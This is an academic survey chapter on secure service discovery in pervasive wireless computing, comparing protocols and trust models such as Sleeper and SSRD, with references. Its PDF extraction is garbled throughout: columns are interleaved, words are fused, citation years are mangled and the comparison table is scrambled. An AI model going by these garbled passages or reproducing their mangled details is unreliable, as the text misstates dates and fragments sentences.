Handbook of Research On Wireless Security - Zhang & Others

Handbook of Research on
Wireless Security
Yan Zhang
Simula Research Laboratory, Norway
Jun Zheng
City University of New York, USA
Miao Ma
Hong Kong University of Science and Technology, Hong Kong
Volume I
Information science reference

Hershey • New York
Secure Service Discovery
mobile devices, but also for sharing of resources content sharing, communication, and gam-
between devices. There are four elements found ing.
in the service-oriented approach: (1) service de-
scription, which provides an interchangeable way Due to these trends, richer models of discovery
for devices to describe the service and its use; (2) are being considered such as federated discovery,
service registration or advertisement on behalf of meta discovery, and semantic discovery (Buford,
the service provider; (3) service discovery by de- Brown, & Kolberg, 2006; Buford, Celebi, &
vices seeking a service; and (4) service invocation, Frankl, 2006).
which is a protocol by which a service requester Consequently, it is important for wireless de-
and service provider coordinate to deliver a service. vices to securely participate in service discovery
Propagation of service advertisements can be using with other devices that are outside the immediate
pull (query), push (announcement), or a combina- administrative security domain. Further, these
tion of pull and push. In addition, the ability to devices interact with other devices in an ad hoc
dynamically discover and combine component
services to form new services is referred to as leads to the dependency on other devices for re-
service composition. sources. The nature of devices, communication
Broadband wireless technologies such as patterns, and dependency on other devices in turn
WiMax, UWB, and 802.11n are bringing broad- causes security vulnerabilities. Due to the ad hoc
band connectivity to mobile CE devices. These connectivity and dynamic nature of the population
devices will be able to switch between different -
network access technologies. This has the following mittent and short-lived. Moreover, multiple devices
consequences for service discovery in pervasive
computing:
responsive service discovery model.
• Due to broadband connectivity, devices Thus far, we have discussed the general view
will be able to participate in media-rich and of and motivation for service discovery for mobile
sophisticated resource sharing. devices. The rest of the chapter is organized as
• Wide-area service discovery and location- follows: The next section summarizes the security
based discovery will grow in importance due goals for service discovery and presents a model
to the combination of increased connectivity for service discovery in pervasive computing. The
and wide-area roaming. third section surveys present unsecured service
• The ability to act as multi-homed devices discovery models. The fourth section surveys ex-
means that devices will have increased isting secure service discovery models, organized
connectivity but also an increased rate of into three different categories. Two case studies
transitions due to roaming between different of service discovery protocols that incorporate
networks. trust-based mechanisms are described in the
• Devices will be able to simultaneously par-
ticipate in a personal area network (PAN), sections summarize important research issues and
home networks, and wireless area networks conclusions.
(WANs) with different security and trust
properties. In PANs and home networks,
mediation of service discovery between
networks is needed, in which devices such
as gateways proxy or intermediate service -
discovery between network domains. covery is well established (Matsumiya et al., 2004;
• Device-to-device interaction will grow in Stajano, 2002; Stajano & Anderson, 2002). Privacy,
importance to users for applications such as security, and trust issues in service discovery in the
pervasive computing area are of utmost importance crossing administrative boundaries, or without
(Robinson et al., 2005). Thus, the service discovery infrastructure support, other mechanisms are
process demands models that ensure the privacy needed.
and security of the user. In particular, this privacy Further, traditional security mechanisms do
and security should encompass: not work well in this environment because the
devices are computationally limited and the no-
• Authentication: Does the user and device tion of physical security is not applicable (Kagal,
actuallyhavetheindicatedidentity? Finin, & Joshi, 2001). Then, considering the choices
• Authorization: Does the user have access of totally sacrificing security versus imposing a
rights for issuing service advertisements, full-edged
fl securitystructuresimilartodeskt
requestingservices,andinvoking andservices?
laptops, the question is whether there is any
• Trust: Are the participating user and device middle ground. Ensuring varying levels of security
trusted?Aretheserviceanditsfor components
various services is a research challenge. The
trusted? insufficiency of user/device identity for trust is
• Privacy: Is only the approved information another concern in designing a discovery model,
shared between the given users/devices dur- and techniques for peer trust and risk assessment
ing service discovery, advertisement and (Chen, Jensen, Gray, Cahill, & Seigneur, 2003)
invocationSDAI) ( operations?Isdisclosure are important tools to address this.
tounauthorizedusersprevented?Desired characteristics of a secure and private
• Vulnerability to attack and misuse: Are service discovery model are summarized next.
the SDAI operations protected from attacks
such as denial-of-service, spoofing, replay, • Adaptive: The trust value and security level
andman-in-the-middle?AretheSDAI-opera should be adaptable depending on the service
tions protected from misuse in enabling such itself, the service provider, and the service
attacksonothernetworkcomponents? requester.
• Trust reliant: The model should consider
An important question is what security, privacy, trust relationships among devices. Where
and trust mechanisms are provided by the wireless no prior information is available, reputa-
network. IEEE 802.11i, also known as WiFi Pro- tion, recommendation, or trust negotiation
tected Access 2 (WPA2), replaced Wired Equiva- schemes can be used. If these are unsuitable,
lent Privacy (WEP) with stronger encryption and then risk assessment can be used.
a new authentication mechanism incorporating an • Infrastructure independence: No infra-
authentication server such as remote authentication structure support (e.g., powerful servers,
dial in user service (RADIUS). This mechanism proxies) should be required. Then the model
while suitable for enterprise deployment has had should work independently without any
limited use in home networks because of complex external support, but be able to leverage
administration and in public hot spots due to dif- infrastructure where it exists.
ficultyadministeringsharedkeys.Thus,•inthe best
Lightweight: The model should be light-
case, a set of devices are authenticated in a single weightintermsofexecutablefilesize.
administrative domain, and the authentication • Service oriented: To control service security
server can be used to support authorization poli- modularly, service discovery models should
cies including policies related to service discovery be service oriented.
and use. Network packets between authenticated • Graceful performance degradation: The
users are encrypted, providing communication model should not put much overhead on the
privacy from non-authenticated parties. However, performance of the device, and performance
these security capabilities cover only a subset of should degrade gracefully for more advanced
the aforementioned security goals and are limited security features.
to single administrative domains. For interactions

• Energy efficient: Service discovery models of local services. After receiving a broadcast, each
should be energy conserving, for example, node updates its service list with information about
avoiding continuous broadcasting or polling. the other nodes’ services. This service information
is included in that node’s subsequent broadcast.
Aclassificationanddetailedsurvey Eachofservice
node is a broadcaster and DEAPSpace uses
discovery models can be found in Zhu, Mutka, and contention timers at each node so that a node will
Ni (2002). Service-oriented architectures (SOA) randomly delay its broadcast after another broad-
and their security are discussed in Cotroneo, cast is received. DEAPSpace can reduce service
Graziano, and Russo (2004). We classify existing discovery time at the cost of increased bandwidth
service discovery models into two broad categories. and power consumption.
First are service discovery models that do not ad- INS (Winoto et al., 1999) supports both pull
dress security issues (Balazinska, Balakrishnan, and push delivery of service advertisements. It also
& Karger, 2002; Microsoft, 2000; Miller, Nixon, supports unicast, anycast, and broadcast methods.
Tai, & Wood, 2001; Nidd, 2001; Winoto, Schwartz, It offers the best-match resource information and
Balakrishnan, & Lilley, 1999). Second, there also provides facilities for limited support of
are models that consider a full-edged fl security
context information. In INS each device requests
mechanism with the help of infrastructure sup- a central name resolver for the type of services
port (Czerwinski, Zhao, Hodes, Joseph, & Katz, it requires, and the resolver replies with the best
1999; Zhu, Mutka, & Ni, 2003, 2004). The next matched device address.
two sections discuss examples of these cases, and
Table 1 compares the key features of the surveyed secure service discovery Models
systems.
Most contemporary service discovery models
fall into this category. There are some models
sErvIcE dIscovEry ModEls that include full-edged fl security mechanisms,
wItHout InHErEnt sEcurIty while others rely on simple algorithms for limited
security. This category can be subdivided into
We describe several designs that do not address infrastructure based, infrastructureless, hardware
security requirements. Nevertheless these mod- based, and smart-space-oriented security mecha-
els are important either because the systems are nisms. In the following subsections we discuss
widely used, are representative approaches, or each of these categories.
could be secured by additional mechanisms in
a secure network. The designs we discuss are Infrastructure-based security
Bluetooth, DEAPSpace, and Intentional Naming
System (INS). UPnP is a specification for connecting multiple
Bluetooth (Bluetooth Special Interest Group devices on a home network so that these devices
[SIG], 2001a, 2001b) is a pull protocol. Device caninvokeservicesofeachother.UPnPdefinesa
information, services, and the characteristics of set of protocols and a service description format.
the services are queried and connections between In addition, UPnP standardizes various service
two or more Bluetooth devices are established. interfaces. UPnP relies on administratively scoped
This facilitates user selection, scope-awareness, multicast IP address for service discovery, service
and both unicast and broadcast communication. advertisement, and event delivery. Each UPnP
A Bluetooth device returns all matched resource devicebroadcastsitsadvertisementswhenit
information. connects to the network. Thereafter, a UPnP device
Nidd (2001) developed the DEAPSpace service broadcasts advertisements in response to queries
discovery method for ad hoc and mobile device ap- from other devices. These queries may be for all
plications. Each node broadcasts its advertisement services on the network or a specific service on

TableComparison
1. ofsecureservicediscoverymodels(SSDS)SSDS : (Czerwinskietal.Ninja
19),
(Goldberg,Gribble,Wagner,Brewer, & Gribble
19; etal.UPnP
201), (Milleretal.SPDP 201),
(AlmenarezCampo, & Progressive
203), Exposure(Zhuetal.Zhu, 204; , Mutka,Ni,
& Splendor
206),
(Kagal, Korolev, Chen, Joshi, & Finin, 2001), Jini (Sun Microsystems, 2001), CSAS (Minami & Kotz,
CSM
205), (BrezillonMostefaoui,
& AVCM
204), (ShankarArbaugh,
& CSRA 20), (Tripathi,Ahmed,
Kulkarni,Kumar,&Kashiramka,204),TRAC(Basu&Callaghan,205),SME(Kopp,Lucke,&Ta -
vangarian,HCA 205), (Pearson,SSRD205), (Sharmin,Ahmed,Ahamed,
& 206a)SSRD+
, (Sharmin,
Ahmed, & Ahamed, 206b), Centaurus2 (Undercoffer, Perich, Cedilnik, Kagal, & Joshi, 203), SLP
(Barbeau,19;Guttman,Perkins,Veizades,&Day,19),Sleeper(Buford,Celebi,etal.,206)
Infrastructure smart
service- trust Privacy context
Model Adaptive support lightweight space
oriented Aware Aware Aware
needed needed
SSDS No Yes No No N/A N/A N/A No
Ninja No Yes No No N/A N/A N/A No
UPnP No N/A No No No Yes No Limited
SPDP No No Yes No Yes N/A No No
Progressive
No Yes No No No Yes Limited No
Exposure
Splendor No Yes No No Yes Yes N/A No
Jini No N/A No No N/A Yes N/A Limited
CSAS No No Yes No N/A N/A Yes No
CSM Yes No Yes No N/A N/A Yes No
AVCM Limited No Yes No Yes Yes Yes No
CSRA No Yes No No N/A N/A Yes Yes
TRAC No N/A No No Yes Yes N/A Yes
SME Yes N/A N/A Yes N/A Yes No N/A
HCA No N/A Yes No No Yes No N/A
SSRD Yes No Yes Yes Yes Yes Limited No
SSRD+ Yes No Yes Yes Yes Limited Yes No
Centaurus Yes Yes No No No N/A Yes No
SLP No Yes Yes Yes No No No No
Sleeper Yes No Yes Yes Yes Yes No No
thenetwork.UPnPDeviceSecurityspecification heterogeneous network domains. The system uses a

definessecuritymechanismsforsimple - object
local ac
certificate authorityCA) ( andeachentitymus
cess protocol (SOAP)-based service invocation, but be pre-registered in the system. The CA issues a
does not address simple service discovery protocol certificatetoeachidentifiedandverifiedentity.T
(SSDP) security. design of Centaurus2 includes four components,
As an extension of project Centaurus (Kagal, and each component has a separate private key
Korolev, Avancha, et al., 2001; Kagal, Korolev, which is stored at the client using PKCS #11:
Chen, et al., 2001), Centaurus2 (Undercoffer et al.,
2003) provides a secure mechanism for service dis- 1. The local CA is responsible for issuing digital
covery and enables users to access services across certificates and for validating these digit
certificates.

2. The communication manager mediates com- access or denial respectively. This approach fa-
munication between clients and networked cilitatesconfidentiality,integrity,andscalab
services. To authorize access, CSAS uses previously stored
3. Group membership(s) is maintained and information,whichmaybedifficulttocollectfor
stored by the capability manager. users in an ad hoc network.
.4 Eachclientisregisteredtoaspecificservice Splendor (Zhu et al., 2003) is a secure, private,
manager that ensures security, access rights, and location-aware service discovery protocol.
and mediates between user client and service Splendor adapts depending on the network en-
client. Service managers maintain a service vironment to use either a client-service model or
registry. client-service-directory model. Proxies are used to
offloadworkloadformobileservices.-Mobileser
Each domain has a root service manager. Static vices authenticate with proxies and proxies handle
bridgesareconfiguredbetweenservice managers
registration. In these situations, proxies are consid-
in different domains. Then clients in separate do- ered to be trusted servers. However, if no trusted
mains can access services across domains using server is available in an environment, then there
the root service manager as the context. is no agent to handle the registration. Its security
In SSDS (Czerwinski et al., 1999), both service model is based on mutual authentication.
advertisement pull (query) and push (announce- Progressive Exposure (Zhu et al., 2004, 2006)
ment) are supported. Service advertisements are is a secure service discovery approach. It ad-
stored in a hierarchy of servers. SSDS provides dresses privacy issues using a mutual matching
capability-based access control. All information technique. Progressive exposure addresses security
passed between clients and servers is encrypted. and fairness by not exposing too much informa-
A single copy of the resource information is stored tion. In each round of message exchange between
and accessed, which makes the system vulner- communicating parties, it tries to find whether
able to single point failure. Subsequently, the any mismatch occurs. In case of a mismatch, the
Ninja project (Goldberg et al., 1999; Gribble et al., communication stops. It uses one-time code words
) 1added
02 the concept of secure identification and a hash-based message authentication code. It
of service through SSDS. In Ninja, the CA issues considers the presence of one user and one service
valid certificates and the capability - manager
provider, au not address situations in which
but it does
thorizes user access to a particular resource. The many users and many service providers are present.
service providers can also prescribe the conditions When a service provider leaves the network, the
(capabilities) that are needed by a user in order to process of provider lookup and the authentication
discover a particular service. phase is restarted. It provides privacy for service
The context-sensitive authorization scheme information, requests, domain identity, and user
(CSAS) (Minami & Kotz, 2005) provides authoriza- credentials, and is based on the client-service-
tion without a central server or CA. When a CSAS directory model.
user wants to access a service from a resource,
the associated server issues a logical authentica- Infrastructure-less security
tion query and sends it to the host of the resource.
Each host has a knowledge domain with which it SPDP (Almenarez & Campo, 2003) is a secure
attempts to prove the authorization query. If it fails, service discovery protocol based on the PTM
it distributes several portions of the proof to multiple (Almenarez, Marin, Campo, & Garcia, 2004; Al-
hosts. Through this distribution CSAS reduces the menarez, Marin, Dyaz, & Sanchez, 2006) model.
computational overhead on any single node. After The need for a centralized server is avoided by
collecting the sub-proofs from the other hosts, the having each device act as its own CA. For a service
host of the resource can declare the result of the request, this model uses broadcast messaging. The
query to be true or false, thus indicating grant of requesting device updates its cache after getting a

reply from the devices (if any reply). It then stores language (WSDL) and resource description frame-
the device identities that it believes trustworthy. work (RDF) conditions for security, and policies for
The devices’ user agents continually listen for thebindingprotocol.Thebindingprotocolspecifies
messages, which in turn means continual energy whether the binding of a resource is “shared” or
consumption. “private,” and whether the binding is “permanent”
Narendar Sarkar et al. (Shankar & Arbaugh, or “context-based.”
2002) propose an attribute vector calculus (AVCM) Basu and Callaghan (2005) present a TRAC
for modeling trust. Their model describes both for increasing security and user confidence in
identity-based trust and context-based trust and is pervasive computing systems. They use trust and
oneofthefirstmodelsthatdiscussesthe importance
role-based access control for ensuring security and
of trust in a ubiquitous environment. Brezillion privacy. However their model is aimed at an intel-
and Mostefaoui (2004) present a context-based ligent environment (IE) only. This policy-based
security model (CSM) and they discuss the need for modelallowsuserstodefinepoliciesforthemselve
adaptive security based on the particular situation. and thus gives users control to define their own
Thomas and Sandhu (2004) present the challenges security level. This model works in an IE because
and research issues for secure pervasive computing. every user is known beforehand. However, in a
They express the need for a dynamic trust model truly pervasive environment it is not possible to
as the pervasive computing environment poses have prior information about every user and thus,
new kinds of security challenges due to its diverse this model is not applicable.
nature. They present a socio-technical view.
smart space dependent security ExAMPlEs usIng trust ModEls
A smart space provides devices with complex com- We next describe two service discovery protocols,
putational support that supports context-awareness Sleeper and SSRD, which incorporate trust models
and collaboration. Components of the smart space for infrastructure-less security.
canoffloadsecurediscoverytasksandrelatethem
to other activities in the space. Examples include sleeper
context-based secure resource access (CSRA)
(Tripathi et al., 2004) and trust-based architecture Sleeper (Buford, Celebi, et al., 2006) is an en-
(TRAC) (Basu & Callaghan, 2005). ergy-preserving service discovery protocol which
CSRA (Tripathi et al., 2004) focuses on context- features dynamic proxy selection for advertise-
aware discovery of resources and how to access ment and discovery so that nodes can go to power
resources in a secure and unobtrusive manner. In standby while the proxy advertises on their behalf.
a pervasive computing environment the rules and The basic node states and transitions for Sleeper
limitations imposed by the user, system, and the are shown in Figure 2. An off-line or disconnected
collaborative activity scenario have to be combined node moves to an online state and broadcasts a
dynamically at runtime. CSRA uses a namespace join message that includes its advertisements and
related to each user and domain. These namespaces their popularity metrics. The current proxy caches
collect resources, services, and activities. The these advertisements. Any proxy-candidate node
bindingprotocoldefinestheassociation may alsoofa user
cache these advertisements. An online
to a specific resource in the space. Thenode binding
may broadcast a leave message prior to go-
changes based on the contextual information of ing off-line; if a leave message is not transmitted,
the user including the location, activity, and role. advertisements may be purged from the proxy and
A descriptor is associated with each namespace other online nodes’ cache by expiration. Transi-
that combines functional attributes collected from tions to/from standby state may also be indicated
resource descriptions in Web services description by broadcast messages.

An online node can be in one of four states et al., 2001). In this design, access control policies
(Figure 2). Every node initially goes online as a determine which credentials, services, and policies
non-proxy node. A proxy-capable node becomes should be disclosed during a negotiation. Policies
a proxy-candidate. There may be more than one and credentials are secured locally at each node
proxy-candidate at any time. When no proxy is but are disclosed during negotiation to the remote
detected, for example by absence of a service ad- party. Sleeper nodes establish mutual trust using
vertisement broadcast or at the exit of a proxy, the thetrustnegotiationmechanismdefinedinBufor
firstproxy-candidatetoissuetheproxy bootstrap
Park, and Perkins (2006). Assuming that each peer
becomes the proxy. A vacating proxy may transfer caches public keys for certificate issuers that a
its cache to the new proxy, or the new proxy may relevant to its peer trust policies, then peer trust
collect advertisements from online nodes through establishment can be performed without a central-
the bootstrap. Nodes which are in standby state ized authority. A service discovery mechanism
during the proxy change may be polled by the is privacy preserving, if a peer can discover the
new proxy after the standby node transitions to service description using the mechanism only if the
online. peersatisfiesthecriteriaC.Thusamechanismtha
Sleeper uses property-based peer trust to secure only distributes service descriptions to peers which
service discovery operations. In property-based or are members of group G with criteria C is privacy
credential-based trust (Hess et al., 2002; Seamons, preserving. Sleeper uses trust negotiation to create
Winslett, & Yu, 2001), each party has a set of certi- groups of peers that satisfy membership criteria C.
fiedattributese. ( g.credit
, cardnumbers, employee
Group management is provided by a group service
ID) that are exchanged to establish mutual trust. (GS) that is available at every peer. The GS caches
The typical components of a mechanism to provide private service descriptions for each group and
property-based trust include: allows only group members to retrieve them. The
GS publishes encrypted service descriptions that
• Trust negotiation protocol can only be decrypted by members of G. These
• Trust negotiation policies encrypted service descriptions are broadcasted to
• Credentials all connected peers, but can only be decrypted by
group members.
Amethodfortrustnegotiationhasbeen Thedefined
secure agent technology (Buford, Park, et
for client-server context (Hess et al., 2002; Seamons al., 2006) used in Sleeper for trust negotiation can
also be used for enabling trust in service composi-
tion (Buford, Kumar, & Perkins, 2006).
FigureSleeper
2. nodestatesandstatetransitions;
online nodes can be in one of four states (Buford ssrd
etal.,206)
With a view to ensure enhanced security through
a lightweight solution for resource discovery in
pervasive environment, simple and secure re-
source discovery (SSRD) has been proposed by
the researchers in Sharmin et al. (2006a). The
fundamental part of the solution is a trust–based,
service-oriented adaptive security mechanism built
on middleware adaptability for resource discovery,
knowledge usability, and self-healing (MARKS), a
middleware and framework developed for resource
constrained pervasive devices for pervasive appli-
cations (Sharmin et al., 2006b). The SSRD unit of

Figure 3. Sleeper groups in broadcast of advertise- Figure 4. Resource discovery model (Sharmin et
ments;symmetrickeysarebroadcastwith al.,206a)public
keyencryption(Buford,Celebi,etal.,206)
MARKS consists of trust management and security

management sub units and it provides a resource
discovery agent (Figure 4).
The trust management unit is responsible for
maintaining trust relationships with other devices.
It calculates trust values for the relationships be- the requester. This lessens both the computation
tween devices and also updates the trust values cost and the communication overhead.
depending on the behavior of the service provider or Trust models are designed to associate each
requester.Itmaintainsalistofservice- - specific
device with aaver
trust value based on past behavior
age trust values and communicates to the security with the requesting device. Also when we cal-
management unit whenever necessary. Trust values culate a trust value for an unknown device, we
arequantifiedintherangeofto 0. to
0. 1 represent
consider the PGP (Zimmermann, 1995) based
the degree of trustworthiness of a node. Complete trustmodel.PGPisbasedonmutualcertification
trust and complete distrust are represented by 1.0 of the validity of the keys. In case a new device
and 0.0 respectively. A new device with no prior joins the network or a device that never communi-
interaction record is assigned a value of 0.5, which cated with a service-providing device, the service
indicates a neutral condition. The dynamic property providing device generates a multicast message
trust evolves over time and may possess the asym- to all devices that it has interacted with and asks
metric transitive property depending on services. for their recommendation about this device. From
Each owner or manager of a device retains a table the recommendations the trust value is calculated
that indicates the security level (ranging from 1 for that service. The issue with dynamic update of
to 10) required by each of the available services trust values has been addressed more clearly with
or applications. The resource manager consults specific situations in the researchers’ enhan
“Service-trust” for all the neighboring nodes to adaptation of this model named SSRD+ (Sharmin,
decide whether the service could be provided. Ahmed, & Ahamed, 2006c).
For example, for services with security level < 5,
no trust calculation or secure communication is
needed. For services with higher security levels, futurE rEsEArcH
initially trust is calculated and then secure com-
munication is established between the provider and The open and dynamic nature of the pervasive com-
puting environment requires a security mechanism
0
that is unobtrusive to the user and makes it possible trust formation, evolution, and exploitation. In
to securely provide and discover the services avail- general, trust is formed by experience through
able for the user in a transparent manner. Some earlier interactions, verifiable properties of
of the open issues regarding challenges in secure party, recommendations from trusted entities, and
and private service discovery are highlighted in reputation in a community. The challenges faced
this section. during trust establishment are due to the absence
of a global trust framework, the large number of
Privacy autonomous and anonymous entities, the large
number of domains, and different trust require-
Although contextual information plays a pivotal ments for large number of application contexts.
role in dynamic pervasive environments, it may Recent context-aware trust models focus on
also expose private information. When granting dynamic trust values, which are updated over time
access to a service, a person’s context information and distance and incorporate behavioral models for
like location, time, and activity can be exposed. evolution of trust. Risk analysis maps each action
Further, policies and constraints are themselves to possible outcomes associated with a cost/ben-
subject to privacy protection. Private information efit.Decisionsconsiderthelikelihoodoftheris
management, such as the recursive constraint and cost. Unresolved issues in trust establishment
based security model in Hengartner and Steen- include detecting and prevent collusion, manag-
kiste (2006), is one approach to prevent direct ing the trade-off between privacy and property
information leakage. However, such mechanisms disclosure,andefficienttrustmechanismsinlar
are generally susceptible to attacks involving col- communities.
lusion and inference.
In a context- and location-sensitive medical Multi-Protocol Environments
application, researchers developed a system for
practitioners to easily share context in their work The combination of multi-homed mobile devices
tasks. Subsequently, questions of privacy led the and multiple service discovery protocols means that
designers to limit access to this information. As service access may cross not only administrative
another example, the Gaia project has shown a pri- boundaries but also different service discovery
vacy preserving hop by hop routing algorithm that domains with varying security properties. As an
carries information about the location of the user example, a mobile device may include protocol
but does not reveal the exact location or identity support for Bluetooth, SLP, and UPnP. Then the
of the user. Thus the privacy level and willing- device can easily discover services in different
ness of disclosure of personal information varies domains that it roams to, if these domains use dif-
depending on information type, collection method, ferent service discovery protocols. As a multi-home
time, and other factors. In some scenarios users device, it may simultaneously connect to domains
are reluctant to disclose identity information but do with different service discovery protocols.
not care about location information. The situation As a second example, a single user may have a
might be reversed in other cases. Formulation of setofpersonalmobiledevicesconfiguredinaPAN.
policies that are understood and can be managed These devices can use the PAN security mechanism
by users is an important goal. for security and privacy control, and identity-based
authentication for mutual trust. The PAN may sup-
trust portaspecificservicediscoveryprotocol.Oneor
more of the devices in the PAN may also connect to
As discussed earlier, a key element for secure outside networks with different service discovery
service discovery in ad hoc environments is the protocols and security mechanisms.
ability to establish a level of trust betweens peers. These types of scenarios indicate that future
The trust life cycle can be narrated in short as mobile devices may need to operate in multiple

Figure5.ConceptualdiagramofSSRDmodel(Sharminetal.,206b)
security contexts. In these cases there is the po- services that may be created from different service
tentialforconflictingaccesspolicies - andunantici
sources. Composition trust bindings (Buford, Ku-
patedinformationows fl betweendifferent mar, regions.
et al., 2006) are one approach for providing
Further, there are challenges in managing groups trust in both control and data paths in peer-to-peer
across domains and mapping service semantics service composition.
and identities between different domains.
trust in service composition conclusIon
A device in a pervasive computing environment The general availability of broadband-wireless-

may offer a service to other devices. The service enabled devices is a key catalyst in enabling many
may be aggregated from services offered by other powerful peer-to-peer usage patterns, which have
devices. By aggregating service facilities across been described as pervasive computing. However,
devices, a collection of limited-resource devices these usage scenarios will frequently involve de-
may be able to offer services that would otherwise vices which are outside a single secure administra-
not be available. However, devices which invoke tive boundary and may include ad hoc interactions
or participate in these services may be concerned where no prior trust relationship exists. Further,
about the integrity and trustworthiness of the vari- thereissignificantvariationinbasicauthentic
ous components that are combined to provide these authorization, and privacy mechanisms offered in
services. Existing service discovery mechanisms wireless networks. Consequently many existing
do not expose such nested or recursive relationships designs for service discovery have insufficient
when a service is offered or invoked. security, privacy, and trust support.
Conventional methods for assuring trustwor- Assuming that most wireless networks will
thiness of software components are typically in the future provide encrypted transmission,
used to convey trustworthiness to the end user or user/device authentication, and authorization
developer. They provide no explicit representation control in a given administrative domain, there
of trust between distributed components. Further, remain important security related questions for
these methods do not explicitly validate composite service discovery in cross-domain cases, in ad hoc

cases, and when the devices/users are not a priori WorkshoponIntelligentEnvironments(IE0502 ) 5

mutually authenticated. Consequently, we do not (pp. 223-229).
expect that improvements in the security of wire-
Bluetooth Special Interest Group. (2001a). Speci-
lessnetworks,whileimportant,willbesufficient
fication of the Bluetooth system—Core [Version
toaddressalltherequirementsidentifiedherefor
1.1].
secure service discovery.
Toward this end, after surveying a variety of Bluetooth Special Interest Group. (2001b). Speci-
approaches to secure service discovery today, fication of the Bluetooth system—Core [Version
we presented case studies of two recent service ]. . 1 . 1 SDPspecification(Vol.1partE).
discovery protocols, which include trust establish-
ment mechanisms to enable trust between a priori Brezillon, P., & Mostefaoui, G. (2004). Context-
untrusted devices and peers. We also provided a based security policies: A new modeling approach.
summary of future research directions. In Second IEEE International Conference on
Pervasive Computing and Communications-work-
shops (pp. 154-158).
rEfErEncEs Buford, J., Brown, A., & Kolberg, M. (2006). Meta
service discovery. In Proceedings of the Fourth
Almenarez, F., & Campo, C. (2003). SPDP: A secure IEEE Conference on Pervasive Computing and
service discovery protocol for ad-hoc networks. In Communications Workshops, Workshop on Mobile
Ninth Open European Summer School and IFIP Peer-to-peer (pp. 124-129).
Workshop on Next Generation Networks (EUNICE
2003) (pp. 213-218). Buford, J., Burg, B., Celebi, E., & Frankl, P. (2006).
Sleeper: A power-conserving service discovery
Almenarez, F., Marin, A., Campo, C., & Garcia, C. protocol. In Third Annual International Conference
(2004). PTM: A pervasive trust management model on Mobile and Ubiquitous Systems, Networking,
for dynamic open environments. In Pervasive and Services (Mobiquitous)026 (pp. 1-10).
Security, Privacy, and Trust (PSPT 2004).
Buford, J., Celebi, E., & Frankl, P. (2006). Property-
Almenarez, F., Marin, A., Dyaz, D., & Sanchez, based peer trust in the sleeper service discovery pro-
J. (2006). Developing a model for trust manage- tocol. In 30th Annual International Computer Soft-
ment in pervasive devices. In Fourth Annual IEEE wareandApplicationsConferenceCOMPSAC ( ’0, ) 6
International Conference on Pervasive Computing Workshop on Security, Privacy, and Trust for
andCommunicationsWorkshops(PERCOMW’0) 6 PervasiveApplicationsSPTPA ( (Vol.
) 026 2, pp.
(pp. 267-271). 209-214).
Balazinska, M., Balakrishnan, H., & Karger, D. Buford, J., Kumar, R., & Perkins, G. (2006). Com-
(2002). INS/Twine: A scalable peer-to-peer ar- position trust bindings in pervasive computing
chitecture for intentional resource discovery. In service composition. In Proceedings of the Fourth
International Conference on Pervasive Computing IEEE Conference on Pervasive Computing and
(pp. 195-210). Communications Workshops, Workshop on Per-
vasive Computing and Communication Security
Barbeau, M. (1999). Service discovery in a mobile
(PerSec) (pp. 261-266).
agent API using SLP. In Global Telecommunica-
tionsConferenceGLOBECOM ( ’9(Vol.
)9 1a, pp.Buford, J., Park, I., & Perkins, G. (2006). Social
391-395). certificates and trust negotiation. Third IEEE In
Consumer Communications and Networking
Basu, J., & Callaghan, V. (2005). Towards a trust
Conference (CCNC 026 ) (pp. 615-619).
basedapproachtosecurityanduserconfidencein
pervasive computing systems. In IEE International

Chen, Y., Jensen, C., Gray, E., Cahill, V., & Sei- Hess, A., Jacobson, J., Mills, H., Wamsley, R.,
gneur, J. (2003). A general risk assessment of Seamons, K., & Smith, B. (2002). Advanced cli-
security in pervasive computing (Tech. Rep. No. ent/server authentication in TLS. In Network and
TCD-CS-2003-45). The University of Dublin, Trin- Distributed System Security Symposium.
ity College, Department of Computer Science.
Joseph, A., Katz, R., Mao, Z., Ross, S., & Zhao, B.
Cotroneo, D., Graziano, A., & Russo, S. (2004). (2001). The Ninja architecture for robust Internet-
Security requirements in service oriented architec- scale systems and services. Computer Networks,
tures for ubiquitous computing. In Proceedings of 5 3 (4), 473-497.
the Second Workshop on Middleware for Pervasive
Kagal, L., Finin, T., & Joshi, A. (2001). Trust-based
and Ad-hoc Computing (pp. 172-177).
security in pervasive computing environments.
Czerwinski, S., Zhao, B., Hodes, T., Joseph, A., & IEEE Computer, 34(12), 154-157.
Katz, R. (1999). An architecture for a secure service
Kagal, L., Finin, T., Joshi, A., & Greenspan, S.
discovery service. In Fifth Annual International
(2006). Security and privacy challenges in open
Conference on Mobile Computing and Networks
and dynamic environments. IEEE Computer,
MobiCom
( ’9)9 (pp. 24-35).
93 (6), 89-91.
Ganu, S., Krishnakumar, A., & Krishnan, P. (2004).
Kagal, L., Korolev, V., Avancha, S., Joshi, A.,
Infrastructure-based location estimation in WLAN
Finin, T., & Yesha, Y. (2001). Highly adaptable
networks. In IEEE Wireless Communications and
infrastructure for service discovery and manage-
Networking Conference (WCNC) (pp. 465-470).
ment in ubiquitous computing (Tech. Rep. No. TR
Garlan, D., Siewiorek, D., Smailagic, A., & Steen- CS-01-06). Baltimore: University of Maryland,
kiste, P. (2002). Project Aura: Towards distrac- Department of Computer Science and Electrical
tion-free pervasive computing. IEEE Pervasive Engineering.
Computing, 1(2), 22-31.
Kagal, L., Korolev, V., Chen, H., Joshi, A., &
Goldberg, I., Gribble, S., Wagner, D., & Brewer, E. Finin, T. (2001). Project Centaurus: A framework
(1999). The Ninja jukebox. In Proceedings of the for intelligent services in a mobile environment. In
Second USENIX Symposium on Internet Technolo- International Workshop of Smart Appliances and
giesandSystems(USITS-)9 (pp. 37-46). Wearable Computing, International Conference of
Distributed Computing Systems (pp. 195-201).
Gribble, S., Welsh, M., Von Behren, R., Brewer,
E., Culler, D., Borisov, N., et al. (1999). Service Kindberg, T., & Fox, A. (2002). System software
location protocol version 2 (RFC 2608). Retrieved for ubiquitous computing. IEEE Pervasive Com-
from http://www.faqs.org/rfcs/rfc2608.html puting, 1(1), 70-81.
He, R., Niu, J., Yuan, M., & Hu, J. (2004). A novel Kopp, H., Lucke, U., & Tavangarian, D. (2005).
cloud-based trust model for pervasive comput- Security architecture for service-based mobile
ing. In The Fourth International Conference on environment. In Proceedings of the Third IEEE
Computer and Information Technology (CIT ’04) Conference on Pervasive Computing and Com-
(pp. 693-700). munications Workshops (pp. 199-203).
Hengartner, U., & Steenkiste, P. (2006). Avoiding Lee, C., & Helal, S. (2002). Protocols for service
privacy violations caused by context-sensitive discovery in dynamic and mobile networks. In-
services. In Proceedings of the Fourth Annual ternational Journal of Computer Research, 11(1),
IEEE International Conference on Pervasive 1-12.
Computer and Communications (PerCom )026
Matsumiya, K., Tamaru, S., Suzuki, G., Nakazawa,
(pp. 222-233).
